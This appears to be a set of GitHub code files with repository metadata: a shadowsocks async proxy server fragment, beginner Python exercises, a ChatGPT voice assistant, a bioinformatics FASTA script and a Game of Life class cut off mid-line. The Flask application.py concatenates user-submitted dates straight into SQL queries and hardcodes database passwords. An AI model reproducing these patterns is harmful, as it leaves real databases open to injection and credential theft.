事件循环一共处理五个状态\n\n STAGE_INIT 初始状态 socket5握手\n STAGE_CONNECT 连接建立阶段 从本地获取addr 进行dns解析\n STAGE_STREAM 建立管道(pipe) 进行socket5传输\n STAGE_DESTROY 结束连接状态\n STAGE_ERROR 异常状态\n \"\"\"\n\n STAGE_INIT = 0\n STAGE_CONNECT = 1\n STAGE_STREAM = 2\n STAGE_DESTROY = -1\n STAGE_ERROR = 255\n\n def __init__(self, port):\n super().__init__()\n\n self.port = port\n self.cipher_man = None\n\n self._stage = None\n self._peer = None\n self.remote = None\n self.transport = None\n self._transport_protocol = None\n self._transport_protocol_human = None\n self._is_closing = False\n self.connect_buffer = bytearray()\n\n def _init_transport(self, transport: asyncio.Transport, peer, protocol):\n self._stage = self.STAGE_INIT\n self.transport = transport\n self._peer = peer\n self._transport_protocol = protocol\n if protocol == flag.TRANSPORT_TCP:\n self._transport_protocol_human = \"tcp\"\n else:\n self._transport_protocol_human = \"udp\"\n\n def close(self):\n self._stage = self.STAGE_DESTROY\n if self._is_closing:\n return\n self._is_closing = True\n\n if self._transport_protocol == flag.TRANSPORT_TCP:\n self.transport and self.transport.close()\n self.cipher_man and 
self.cipher_man.close()\n self.remote and self.remote.close()\n\n def write(self, data: bytes):\n if self._transport_protocol == flag.TRANSPORT_TCP:\n if self.transport.is_closing():\n return\n self.transport.write(data)\n else:\n self.transport.sendto(data, self._peer)\n\n def handle_connection_made(self, transport_protocol, transport, peername):\n self._init_transport(transport, peername, transport_protocol)\n\n def handle_eof_received(self):\n self.close()\n\n def handle_connection_lost(self, exc):\n self.close()\n\n def handle_data_received(self, data):\n \"\"\"\n 异步wrapper\n :param data:\n :return:\n \"\"\"\n if not self.cipher_man:\n self.cipher_man = CipherMan.get_cipher_by_port(self.port, self._transport_protocol, self._peer)\n\n try:\n data = self.cipher_man.decrypt(data)\n except Exception as e:\n logger.exception(\n f\"decrypt data error:{e} remote:{self._peer},type:{self._transport_protocol_human} closing...\"\n )\n self.close()\n return\n\n if not data:\n return\n\n if self._stage == self.STAGE_INIT:\n asyncio.create_task(self._handle_stage_init(data))\n elif self._stage == self.STAGE_CONNECT:\n self._handle_stage_connect(data)\n elif self._stage == self.STAGE_STREAM:\n self._handle_stage_stream(data)\n elif self._stage == self.STAGE_ERROR:\n self.close()\n elif self._stage == self.STAGE_DESTROY:\n self.close()\n else:\n logger.warning(f\"unknown stage:{self._stage}\")\n\n async def _handle_stage_init(self, data):\n atype, dst_addr, dst_port, header_length = parse_header(data)\n if not all([atype, dst_addr, dst_port, header_length]):\n logger.warning(f\"parse_header_error atype: {flag.get_atype_for_human(atype)} port: {self.port}\")\n self.close()\n return\n else:\n logger.info(\n \"parse_header_success atype: {} {} from: {} dst: {}:{}\".format(\n self._transport_protocol_human, flag.get_atype_for_human(atype), self._peer[0], dst_addr, dst_port,\n )\n )\n payload = data[header_length:]\n\n loop = asyncio.get_running_loop()\n if self._transport_protocol == flag.TRANSPORT_TCP:\n self._stage = self.STAGE_CONNECT\n self._handle_stage_connect(payload)\n try:\n task = loop.create_connection(lambda: RemoteTCP(self), dst_addr, dst_port)\n _, remote_tcp = await asyncio.wait_for(task, 5)\n except Exception as e:\n self._stage = self.STAGE_ERROR\n self.close()\n logger.warning(f\"connection_failed, {type(e)} e: {dst_addr}:{dst_port}\")\n else:\n self.remote = remote_tcp\n else:\n try:\n task = loop.create_datagram_endpoint(\n lambda: RemoteUDP(dst_addr, dst_port, payload, self), remote_addr=(dst_addr, dst_port),\n )\n await asyncio.wait_for(task, 5)\n except Exception as e:\n self._stage = self.STAGE_ERROR\n self.close()\n logger.warning(f\"connection_failed, {type(e)} e: {dst_addr}:{dst_port}\")\n\n def _handle_stage_connect(self, data):\n # 在握手之后,会耗费一定时间来来和remote建立连接,但是ss-client并不会等这个时间\n if not self.remote or self.remote.ready is False:\n self.connect_buffer.extend(data)\n else:\n self._stage = self.STAGE_STREAM\n self._handle_stage_stream(data)\n\n def _handle_stage_stream(self, data):\n self.remote.write(data)\n\n\nclass LocalTCP(asyncio.Protocol):\n \"\"\"\n Local Tcp Factory\n \"\"\"\n\n def __init__(self, port):\n self.port = port\n self._handler = None\n self._transport = None\n\n def _init_handler(self):\n self._handler = LocalHandler(self.port)\n\n def __call__(self):\n local = LocalTCP(self.port)\n local._init_handler()\n return local\n\n def pause_writing(self):\n self._handler.remote.transport.pause_reading()\n\n def resume_writing(self):\n 
self._handler.remote.transport.resume_reading()\n\n def connection_made(self, transport):\n self._transport = transport\n peer = self._transport.get_extra_info(\"peername\")\n self._handler.handle_connection_made(flag.TRANSPORT_TCP, transport, peer)\n\n def data_received(self, data):\n self._handler.handle_data_received(data)\n\n def eof_received(self):\n self._handler.handle_eof_received()\n\n def connection_lost(self, exc):\n self._handler.handle_connection_lost(exc)\n\n\nclass RemoteTCP(asyncio.Protocol):\n def __init__(self, local_handler):\n super().__init__()\n self.local = local_handler\n self.peer = None\n self._transport = None\n self.ready = False\n self._is_closing = False\n self.cipher_man = None\n\n def write(self, data):\n if not self._transport.is_closing():\n self._transport.write(data)\n\n def close(self):\n if self._is_closing:\n return\n self._is_closing = True\n\n self._transport and self._transport.close()\n self.local.close()\n\n def connection_made(self, transport: asyncio.Transport):\n self._transport = transport\n self.peer = self._transport.get_extra_info(\"peername\")\n self.cipher_man = CipherMan(access_user=self.local.cipher_man.access_user, peer=self.peer)\n transport.write(self.local.connect_buffer)\n self.ready = True\n\n def data_received(self, data):\n self.local.write(self.cipher_man.encrypt(data=data))\n\n def pause_reading(self):\n self.local.transport.pause_reading()\n\n def resume_reading(self):\n self.local.transport.resume_reading()\n\n def eof_received(self):\n self.close()\n\n def connection_lost(self, exc):\n self.close()\n\n\nclass LocalUDP(asyncio.DatagramProtocol):\n \"\"\"\n Local Udp Factory\n \"\"\"\n\n def __init__(self, port):\n self.port = port\n self._protocols = {}\n self._transport = None\n\n def __call__(self):\n local = LocalUDP(self.port)\n return local\n\n def connection_made(self, transport):\n self._transport = transport\n\n def datagram_received(self, data, peername):\n if peername in self._protocols:\n handler = self._protocols[peername]\n else:\n handler = LocalHandler(self.port)\n self._protocols[peername] = handler\n handler.handle_connection_made(flag.TRANSPORT_UDP, self._transport, peername)\n\n handler.handle_data_received(data)\n\n def error_received(self, exc):\n # TODO clean udp conn\n pass\n\n\nclass RemoteUDP(asyncio.DatagramProtocol):\n def __init__(self, addr, port, data, local_hander):\n super().__init__()\n self.addr = addr\n self.port = port\n self.data = data\n self.local = local_hander\n self.peer = None\n self._transport = None\n self.cipher_man = None\n self._is_closing = False\n\n def write(self, data):\n self._transport and not self._transport.is_closing() and self._transport.sendto(data)\n\n def close(self):\n if self._is_closing:\n return\n\n self._is_closing = True\n self._transport and self._transport.close()\n del self.local\n\n def connection_made(self, transport):\n self._transport = transport\n self.peer = self._transport.get_extra_info(\"peername\")\n self.write(self.data)\n\n def datagram_received(self, data, peer, *args):\n if not self.cipher_man:\n self.cipher_man = CipherMan(access_user=self.local.cipher_man.access_user, ts_protocol=flag.TRANSPORT_UDP)\n\n assert self.peer == peer\n # 源地址和端口\n bind_addr = peer[0]\n bind_port = peer[1]\n if \".\" in bind_addr:\n addr = socket.inet_pton(socket.AF_INET, bind_addr)\n elif \":\" in bind_addr:\n addr = socket.inet_pton(socket.AF_INET6, bind_addr)\n else:\n raise Exception(\"add not valid\")\n port = struct.pack(\"!H\", bind_port)\n # 构造返回的报文结构\n 
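        # Hedged aside on the framing below (not part of the original module):
        # per RFC 1928, the ATYP byte is 0x01 for IPv4, 0x03 for a domain name
        # and 0x04 for IPv6, and the reply is laid out as
        #     [1-byte ATYP][packed source address][2-byte big-endian port][payload]
        # Worked example for a reply arriving from ("8.8.8.8", 53):
        #     socket.inet_pton(socket.AF_INET, "8.8.8.8")  -> b"\x08\x08\x08\x08"
        #     struct.pack("!H", 53)                        -> b"\x00\x35"
        #     frame = b"\x01" + b"\x08\x08\x08\x08" + b"\x00\x35" + payload
        # Note that this method prefixes b"\x01" even on the IPv6 branch above,
        # where RFC 1928 would call for b"\x04" -- worth checking if IPv6 peers
        # are expected.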
data = b\"\\x01\" + addr + port + data\n        data = self.cipher_man.encrypt(data)\n        self.local.write(data)\n\n    def error_received(self, exc):\n        self.close()\n\n    def connection_lost(self, exc):\n        self.close()\n","repo_name":"laoshan-tech/shadowsocks-async","sub_path":"shadowsocks/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"}
+{"seq_id":"11988922661","text":"\"\"\"\nloops.py\n\nDescription:\n    Examples of different for loops sorted by data type\n    1. Integers/static values\n    2. Strings\n    3. Lists\n\"\"\"\n\n\"\"\" INTEGERS \"\"\"\ndef integer_loop():\n    # Iterates thru loop 10 times adding by i to result and prints result\n    integer = 10\n    result = 0\n    \n    for i in range(integer):\n        result += i\n    print(result) # output: 45\n\n\"\"\" STRINGS \"\"\"\ndef string_loop_1():\n    # Iterates thru string, adding character to end of new_string and printing after\n    input_string = \"hello\"\n    new_string = \"\"\n\n    for char in input_string:\n        new_string += char\n    \n    print(new_string) # output: hello\n\ndef string_loop_2():\n    # Does same as `string_loop_1`\n    input_string = \"hello\"\n    new_string = \"\"\n\n    for i in range(len(input_string)):\n        new_string += input_string[i]\n    \n    print(new_string) # output: hello\n\n\n\"\"\" LISTS \"\"\"\ndef list_loop_1():\n    # Takes list, multiplies each item by 2 and prints final result\n    input_list = [1,2,3,4]\n\n    for i in range(len(input_list)):\n        input_list[i] *= 2\n    \n    print(input_list) # output: [2,4,6,8]\n\ndef list_loop_2():\n    # Same as `list_loop_1` yet item does not actually get multiplied by 2\n    input_list = [1,2,3,4]\n\n    for item in input_list:\n        item *= 2\n        # Items are still able to be accessed this way and is still useful!!\n\n    print(input_list) # output: [1,2,3,4]\n    \n\ndef print_formatter(title):  # Helper function\n    print(f\"\\n**********************************************\\n{title}\\n\")\n\n\ndef main():\n\n    print_formatter(\"integer_loop:\")\n\n    integer_loop()\n\n    print_formatter(\"string_loop_1:\")\n\n    string_loop_1()\n\n    print_formatter(\"string_loop_2:\")\n\n    string_loop_2()\n\n    print_formatter(\"list_loop_1:\")\n\n    list_loop_1()\n\n    print_formatter(\"list_loop_2:\")\n\n    list_loop_2()\n\nmain()","repo_name":"dborah123/demo2-repo2","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"25163117052","text":"def bin_search(items, x):\n    i = 0\n    j = len(items) - 1\n    m = (i + j) // 2\n\n    while items[m] != x and i <= j:\n        if x > items[m]:\n            i = m + 1\n        else:\n            j = m - 1  # shrink the upper bound, not the lower one\n        m = (i + j) // 2\n\n    return m  # index of x; the loop stops when items[m] == x\n\nprint(bin_search([1,2,3,4,6,7,8,9], 9))\n\n","repo_name":"mikolavlz/lerning","sub_path":"lesson 19/algoritms/bin_search.py","file_name":"bin_search.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"}
+{"seq_id":"24487009832","text":"# encoding: utf-8\r\n'''\r\n@author: fengding\r\n@email: 924070845@qq.com\r\n@software: PyCharm\r\n@file: 第九次作业3.py\r\n@time: 2018/8/7 17:31\r\n@desc:\r\n'''\r\n\r\nclass Cla:\r\n    def __init__(self, name, age):\r\n        self.name = name\r\n        self.age = age\r\n        print(\"初始化成功\")\r\n\r\n    def __del__(self):\r\n        print(\"调用销毁~\")\r\n\r\nif __name__ == '__main__':\r\n\r\n    mm = Cla(\"韩梅梅\", 10)\r\n    ll = Cla(\"李 雷\", 11)\r\n    bzr = Cla(\"班主任\", 40)\r\n    del bzr\r\n    xz = Cla(\"校长\", 50)\r\n\r\n    
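    # Hedged note (not from the original file): in CPython, `del bzr` drops the
    # last reference to that instance, so its __del__ runs right at that line;
    # mm, ll and xz are only finalized at interpreter shutdown, after the final
    # print below. A minimal illustration of the same effect:
    #     class Probe:
    #         def __del__(self): print("Probe destroyed")
    #     p = Probe()
    #     del p          # "Probe destroyed" prints immediately here
    #     print("after") # runs after the destructor message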
print(\"程序最后一行代码~~~~\\n————————————————\")\r\n\r\n","repo_name":"924070845/TanzhouPythonVipFirstClass","sub_path":"作业/第九次作业3.py","file_name":"第九次作业3.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7315467295","text":"# -*- coding: UTF-8 -*-\nfrom flask import Flask, render_template, url_for, app, request, flash, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nimport datetime, xlrd, os, shutil\nfrom xlrd import open_workbook\nfrom shutil import move\nimport psycopg2\n\n\ndb = create_engine('postgresql://postgres:123456@localhost:5432/postgres')\n\n\n\napplication = Flask(__name__)\napplication.config['SQLALCHEMY_DTABASE_URI'] = \"posgresql://postgres:123456@localhost:5432/postgres\"\n#db = SQLAlchemy(app)\n\n\n@application.route('/')\n@application.route('/main')\ndef index():\n datestart = \"2000-01-01\"\n dateend = \"2030-01-01\"\n result_set = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where date(date_req) between date('\" + datestart + \"') and date('\" + dateend + \"') group by type order by count desc;\")\n return render_template('about.html', result_set=result_set)\n\n\n@application.route('/import_table', methods=['POST', 'GET'])\ndef import_xls():\n excel_type_check = 2\n datestart = \"2000-01-01\"\n dateend = \"2030-01-01\"\n messages_file_not_found = ['Файл \".xlsx/.xls\" не найден! Попробуйте еще раз!']\n messages_success = ['Добавление данных в таблицу БД выполнено успешно!']\n messages_bd_error = ['Не удалось подключиться к БД!']\n messages_general = ['Загружено:']\n if request.method == 'POST':\n failed1_print = 0\n try:\n con = psycopg2.connect(dbname='new1', user='postgres',\n password='Qwertyasdfsega161', host='localhost')\n except:\n return render_template('import.html', messages_bd_error=messages_bd_error)\n print('Не удалось подключиться к базе данных!')\n cur = con.cursor()\n excel_check = 0\n while excel_check == 0:\n try:\n for file in os.listdir(\"./\"):\n if file.endswith(\".xlsx\"):\n excel_full_name = os.path.join(\"./\", file)\n excel_name = excel_full_name[2::]\n elif file.endswith(\".xls\"):\n excel_full_name = os.path.join(\"./\", file)\n excel_name = excel_full_name[2::]\n excel = open_workbook(excel_full_name)\n sheet = excel.sheet_by_index(0)\n #excel_type_check = 0\n break\n except:\n return render_template('import.html', messages_file_not_found=messages_file_not_found)\n #print('Файл \".xlsx/.xls\" не найден! Попробуйте еще раз!')\n break\n\n\n now_time = datetime.datetime.now()\n\n type1 = ''\n\n data_time = sheet.col_values(0)\n tagid = sheet.col_values(1)\n length = sheet.col_values(2)\n ant = sheet.col_values(3)\n cnt = sheet.col_values(4)\n rssi = sheet.col_values(5)\n try:\n tagid.remove('TagID')\n length.remove('Length')\n ant.remove('Ant')\n cnt.remove('Cnt')\n rssi.remove('RSSI')\n data_time.remove('Time')\n data_date = excel_name[8:12] + '-' + excel_name[12:14] + '-' + excel_name[14:16]\n except ValueError:\n messages_value_error = [' В данном .xls/.xlsx файле, отсутствуют имена всех или одних из данных колонок: (Time/TagID/Length/Ant/Cnt/RSSI). 
Либо же, они были введены неправильно!']\n return render_template('import.html', messages_value_error=messages_value_error)\n\n type_check = 1\n\n for i in range(len(tagid)):\n if (tagid[i])[1] == '1':\n type1 = 'Мужчина'\n type_check = 0\n elif (tagid[i])[1] == '2':\n type_check = 0\n type1 = 'Женщина'\n elif (tagid[i])[1] == '3':\n type_check = 0\n type1 = 'Ребенок'\n elif (tagid[i])[1] == '4':\n type_check = 0\n type1 = 'Инвалид'\n elif (tagid[i])[1] == '5':\n type_check = 0\n type1 = 'Пенсионер'\n elif (tagid[i])[1] == '1' or (tagid[i])[1] == '2' or (tagid[i])[1] == '3' or (tagid[i])[1] == '4' or (tagid[i])[1] == '5':\n messages_type_error = [' Не удалось определить \"type\" по значениям в колонке \"TagID\"!']\n return render_template('import.html', messages_type_error=messages_type_error)\n type_check = 1\n break\n\n try:\n cur.execute(\"INSERT INTO test1 (data_time, tag_id, lenght, ant, cnt, rssi, type, created_date, data_date) VALUES (%(data_time)s, %(tag_id)s, %(lenght)s, %(ant)s, %(cnt)s, %(rssi)s, %(type)s, %(created_date)s, %(data_date)s)\",\n {'data_time': data_time[i], 'tag_id': tagid[i], 'lenght': length[i],\n 'ant': ant[i], 'cnt': cnt[i], 'rssi': rssi[i], 'type': type1, 'created_date': now_time,\n 'data_date': data_date})\n except psycopg2.errors.InvalidDatetimeFormat:\n messages_invalid_datetime_format = [' Не удалось верно определить дату по названию файла!']\n return render_template('import.html', messages_invalid_datetime_format=messages_invalid_datetime_format)\n if type_check == 0:\n try:\n shutil.move(excel_full_name, './old_xls')\n\n except shutil.Error:\n for num in range(999):\n try:\n os.rename('./old_xls/' + excel_name, './old_xls/' + str(num) + excel_name)\n shutil.move(excel_full_name, './old_xls')\n break\n except FileExistsError:\n num += 1\n\n #result_set_import = (SELECT )\n con.commit()\n #print('Добавление данных в таблицу БД выполнено успешно!')\n result_set = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where created_date > (now() - interval '10 second') group by type order by count desc;\")\n #result_set = db.execute(\"SELECT 'hello kitty' as type, '10' as count;\")\n return render_template('import.html', messages_success=messages_success, messages_general=messages_general, result_set=result_set)\n cur = con.cursor()\n else:\n messages_type_error = [' Не удалось определить \"type\" по значениям в колонке \"TagID\"!']\n return render_template('import.html', messages_type_error=messages_type_error)\n return render_template('import.html')\n\n\n@application.route('/calendar', methods=['POST', 'GET'])\ndef calendar():\n date_default = datetime.date.today()\n date_default_end = datetime.date.today()\n a = None\n if request.method == \"POST\":\n try:\n req = request.form\n datestart = request.form['dt_start']\n dateend = request.form['dt_end']\n result_set_date = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where date(date_req) between date('\" + datestart + \"') and date('\" + dateend + \"') group by type order by count desc;\")\n #print(result_set_date)\n #for i in result_set_date:\n # count_check = i.count\n # print(count_check)\n # type_check = i.type\n # print(type_check)\n if datestart > dateend:\n messages_wrong_date = [\"Дата конца раньше, чем дата начала!\"]\n return render_template('calendar.html', messages_wrong_date=messages_wrong_date, date_default=date_default, date_default_end=date_default_end)\n elif result_set_date.rowcount < 1:\n messages_empty_rows = [\"Статистика за этот период времени отсутсвует!\"]\n return 
render_template('calendar.html', messages_empty_rows=messages_empty_rows, date_default=date_default, date_default_end=date_default_end)\n\n date_default = datestart\n date_default_end = dateend\n return render_template('calendar.html', result_set_date=result_set_date, date_default=date_default, date_default_end=date_default_end)\n except:\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n else:\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n\n\n\n@application.route('/user//')\ndef user(name, id):\n return 'user: ' + name + '-' + str(id)\n\n\nif __name__ == '__main__':\n application.run(debug=False)\n","repo_name":"kazantsev-s/ksa-sheep-html","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"4619686652","text":"\nimport tkinter as tk\nimport openai\nimport speech_recognition as sr\nimport os\nimport threading\nimport pyttsx3\nimport mygui\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport pvporcupine\nimport pyaudio\nimport struct\nimport time\n\nUSER=\"sir\"\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\n# Load Environment variables\nload_dotenv()\n\n# Load your OpenAI API key\nopenai.api_key = os.getenv('OPEN_AI_KEY')\n\n\n# Set up the speech recognition\ndef recognize_speech():\n \n r = sr.Recognizer()\n\n with sr.Microphone(device_index=28) as source:\n print(\"Listening...\")\n audio = r.listen(source)\n while[True]:\n try:\n speech_text = r.recognize_google(audio)\n print(\"You said: \" + speech_text)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand the audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n \n\n\n\n return speech_text\n\n\n\n\ndef text_to_speech(command):\n\n engine = pyttsx3.init()\n engine.say(command)\n engine.runAndWait()\n\n \ndef continuous_face():\n while True: # Keep the animation running continuously\n mygui.face()\n \ndef start_animation():\n mygui.pygame.init()\n mygui.display()\n animation_thread = threading.Thread(target=continuous_face)\n animation_thread.start()\ndef main_loop():\n\n\n mygui.pygame.init()\n mygui.display()\n \n # Start the animation in a new thread as soon as the window opens\n threading.Thread(target=continuous_face).start()\n running = True\n while running:\n for event in mygui.pygame.event.get():\n if event.type == mygui.pygame.QUIT:\n running = False\n \n # Listen for speech and check if the phrase \"hello\" was said\n\n start_speech_recognition()\n \n \n\n mygui.pygame.display.flip()\n\n mygui.pygame.quit()\n \n\ndef send_to_chatGPT(messages, model='gpt-3.5-turbo'):\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n max_tokens=100,\n n=1,\n stop=None,\n temperature=0.5,\n )\n message= response.choices[0].message.content\n messages.append(response.choices[0].message)\n return message\ndef start_session():\n messages=[{\"role\": \"user\", \"content\":\"Please act like Jarvis from Iron Man\"}]\n while[True]:\n text = recognize_speech()\n if (text==\"stop\"):\n mygui.pygame.quit()\n exit()\n \n \n \n else:\n messages.append({\"role\": \"user\",\"content\":text})\n 
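            # Context note (hedged, not in the original script): `messages`
            # accumulates the whole dialogue -- each user turn is appended above,
            # and send_to_chatGPT() appends the assistant reply
            # (response.choices[0].message) before returning, so every later call
            # resends the full history. That is what gives the bot conversational
            # memory, at the cost of a prompt that grows by two entries per turn;
            # an illustrative guard would be something like:
            #     if len(messages) > 20:
            #         messages = messages[:1] + messages[-19:]  # keep primer + recent turns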
response = send_to_chatGPT(messages)\n\n            text_to_speech(response)\n            print(response)\n\ndef start_speech_recognition():\n    porcupine = None\n    pa = None\n    audio_stream = None\n    try:\n        porcupine = pvporcupine.create(keywords=[\"jarvis\",\"computer\"])\n        pa = pyaudio.PyAudio()\n        audio_stream = pa.open(rate=porcupine.sample_rate, channels=1, format=pyaudio.paInt16, input=True, frames_per_buffer=porcupine.frame_length)\n        while True:\n            pcm = audio_stream.read(porcupine.frame_length)\n            pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n            keyword_index = porcupine.process(pcm)\n            if keyword_index >= 0:\n                print(\"Hotword Detected...\", end=\"\")\n                start_session()\n                time.sleep(1)\n                print(\"J.A.R.V.I.S awaiting your call, \" + USER)\n    finally:\n        if porcupine is not None:\n            porcupine.delete()\n        if audio_stream is not None:\n            audio_stream.close()\n        if pa is not None:\n            pa.terminate()\n\n\nmain_loop()\n\n","repo_name":"Aryandesai1/Jarvis-Voice-Recognition","sub_path":"ChatGPTJarvis.py","file_name":"ChatGPTJarvis.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"32842854535","text":"# Create function fib that returns n'th element of Fibonacci sequence\ndef fibonacci(n: int) -> int:\n    t1 = 0\n    t2 = 1\n    c = 0\n    t3 = 0\n    if n == 1:\n        return 1\n    while c < n-1:\n        t3 = t1 + t2\n        t1 = t2\n        t2 = t3\n        c += 1\n    return t3\n\nprint(fibonacci(2))","repo_name":"ViniciusEZ/Python","sub_path":"Codewars/7kyu/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"37209082377","text":"#!/usr/bin/python3\n\n'''\nTitle: alignments_filter_domains_from_lengths.py\nDate: 2018-01-11\nAuthor: Adam Nunn\n\nDescription:\n  This program takes two input files: 1) tab-delimited file containing on each line a\n  sequence ID and relative start/end positions for a pfam domain contained within the\n  sequence (INPUT_LENGTHS_FILE) and 2) a fasta file containing the relevant sequence IDs\n  and protein sequence on the following line (INPUT_FASTA_FILE). The output is a fasta\n  file containing only the sequence IDs specified in the INPUT_LENGTHS_FILE and the\n  extracted domain sequences on the following line (OUTPUT_FASTA_FILE).\n\nUsage:\n  ./alignments_filter_domains_from_lengths.py INPUT_LENGTHS_FILE INPUT_FASTA_FILE OUTPUT_FASTA_FILE\neg. 
./alignments_filter_domains_from_lengths.py PF00089.lengths.txt Trinity_isoH_cdhit10.fasta.transdecoder.pep PF00089.fasta\n\n'''\n\nimport sys\nimport re\n\noutseqs = []\n\nwith open(sys.argv[1], 'r') as INPUT_LENGTHS_FILE, open(sys.argv[3], 'w') as OUTPUT_FASTA_FILE:\n    for info in INPUT_LENGTHS_FILE: # parse the information in the INPUT_LENGTHS_FILE by line\n        info = info.rstrip()\n        info = info.split(\"\\t\")\n        Found = False\n        INPUT_FASTA_FILE = open(sys.argv[2], 'r') # open the INPUT_FASTA_FILE to find sequences\n        for line in INPUT_FASTA_FILE:\n            line = line.rstrip()\n            if Found == False:\n                matchObject = re.search(info[0] + \":\", line)\n                if matchObject: # sequence ID found in the INPUT_FASTA_FILE\n                    count = 1\n                    while (info[0] + \"__\" + str(count)) in outseqs: # check if sequence has already had domain extracted (some sequences contain domain copies)\n                        count += 1\n                    outseqs.append(info[0] + \"__\" + str(count)) # give new ID to sequence in case multiple domains are extracted from the same sequence\n                    print(\">\" + info[0] + \"__\" + str(count), file=OUTPUT_FASTA_FILE)\n                    Found = True\n                else: continue # sequence ID not found, continue searching INPUT_FASTA_FILE\n            else:\n                start = int(info[1]) # define start position for domain\n                stop = int(info[2]) # define end position for domain\n                line = \"\".join(line[start:stop]) # extract domain from sequence\n                print(line, file=OUTPUT_FASTA_FILE) # print domain sequence to OUTPUT_FASTA_FILE\n                break\n    INPUT_FASTA_FILE.close()\n","repo_name":"bio15anu/thesis","sub_path":"scripts/alignments_filter_domains_from_lengths.py","file_name":"alignments_filter_domains_from_lengths.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"18657943846","text":"try:\n    print(\"start code\")\n    print(error)  # NameError here: 'error' is undefined, so the except branch runs\n    print(\"end code\")\nexcept:\n    print(\"no problem\")\nprint(\"any code...\")\n\n\nclass TapeError(Exception):\n    pass\n\n\ndef checker(var_1):\n    if type(var_1) != str:\n        raise TapeError(f\"Sorry, we don't work with {type(var_1)}, str is expected\")\n    else:\n        return var_1\nchecker(1234)\n","repo_name":"sgudgkrfj/Try_exp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"15521998336","text":"# Script Name: time.py\n# Author: Tanmoy Debnath 121324683\n\n# get number of minutes spent watching tv\nminutes = int(input(\"How many minutes do you spend watching TV: \"))\n\n\n# save as hours\nhours = minutes // 60\n# save the remaining minutes\nminutes = minutes % 60\n\nprint(\"You spend\", hours, \"hours and\", minutes, \"minutes watching TV.\")","repo_name":"tanmoy03/COLLEGE-WORK","sub_path":"PROGRAMMING/CS1117/lab1/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"42691974720","text":"import pathlib\nimport random\nimport copy\n\nfrom typing import List, Optional, Tuple\n\n\nCell = Tuple[int, int]\nCells = List[int]\nGrid = List[Cells]\n\n\nclass GameOfLife:\n    \n    def __init__(\n        self,\n        size: Tuple[int, int],\n        randomize: bool = True,\n        max_generations: Optional[float] = float('inf')\n    ) -> None:\n        # Размер клеточного поля\n        self.rows, self.cols = size\n        # Предыдущее поколение клеток\n        self.prev_generation = self.create_grid()\n        # Текущее поколение клеток\n        self.curr_generation = self.create_grid(randomize=randomize)\n        # Максимальное число поколений\n        
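        # Usage sketch (illustrative only, based on the methods defined below):
        #     life = GameOfLife((24, 80), randomize=True, max_generations=50)
        #     while life.is_changing and not life.is_max_generations_exceed:
        #         life.step()
        #     life.save(pathlib.Path("state.txt"))
        # step() snapshots curr_generation into prev_generation, then
        # get_next_generation() applies the classic B3/S23 rule: a cell is born
        # with exactly 3 live neighbours and survives with 2 or 3.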
self.max_generations = max_generations\n # Текущее число поколений\n self.n_generation = 1\n\n def create_grid(self, randomize: bool = False) -> Grid:\n grid = [[0] * self.cols for _ in range(self.rows)]\n if randomize:\n for i in range(self.rows):\n for j in range(self.cols):\n grid[i][j] = randomize * (random.randint(0, 1))\n return grid\n\n def get_neighbours(self, cell: Cell) -> Cells:\n row, col = cell\n neighbours = []\n if col > 0:\n neighbours.append(self.curr_generation[row][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row][col + 1])\n if row > 0:\n neighbours.append(self.curr_generation[row - 1][col])\n if col > 0:\n neighbours.append(self.curr_generation[row - 1][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row - 1][col + 1])\n if row < self.rows - 1:\n neighbours.append(self.curr_generation[row + 1][col])\n if col > 0:\n neighbours.append(self.curr_generation[row + 1][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row + 1][col + 1])\n\n return neighbours\n\n def get_next_generation(self) -> Grid:\n for i in range(self.rows):\n for j in range(self.cols):\n self.prev_generation[i][j] = self.curr_generation[i][j]\n new_grid = copy.deepcopy(self.curr_generation)\n for i in range(len(self.curr_generation)):\n for j in range(len(self.curr_generation[i])):\n neighbours = self.get_neighbours((i, j)).count(1)\n if neighbours == 3:\n new_grid[i][j] = 1\n elif neighbours == 2 and self.curr_generation[i][j] == 1:\n new_grid[i][j] = 1\n else:\n new_grid[i][j] = 